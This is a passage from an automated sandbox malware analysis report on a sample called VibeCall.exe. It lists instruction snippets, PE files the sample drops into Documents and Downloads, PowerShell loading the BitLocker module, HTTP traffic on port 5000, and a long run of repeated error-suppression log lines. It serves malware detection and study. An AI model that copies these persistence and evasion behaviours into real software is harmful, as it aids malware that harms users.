                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_2_03042C39 push ecx; ret 13_2_03042C59
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_2_0304525D push es; ret 13_2_03045264
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_2_030428EC push edi; ret 13_2_030428F8
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_2_030410F9 push FFFFFF82h; iretd 13_2_030410FB
                      Source: C:\Users\user\Downloads\contry_solution_vibecall_e.exeCode function: 13_2_030444F9 push edx; retf 13_2_030444FC
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeCode function: 14_3_0113C01A push ds; iretd 14_3_0113C036
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeCode function: 14_3_011912F4 push ecx; ret 14_3_01191307
                      Source: C:\Users\user\Documents\soundsolution_vibecall_c.exeCode function: 14_3_01131436 push ds; retf 14_3_0113143B
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeCode function: 15_3_01628904 push ecx; ret 15_3_01628917

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files to the document folder of the user
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Documents\soundsolution_vibecall_c.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Documents\aisolution_vibecall_a.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Documents\soundsolution_vibecall_c.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Downloads\videosolution_vibecall_b.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Documents\aisolution_vibecall_a.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\Downloads\contry_solution_vibecall_e.exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58501 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 58501
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58505 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 58505
                      Source: unknownNetwork traffic detected: HTTP traffic on port 58542 -> 5000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 58542
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
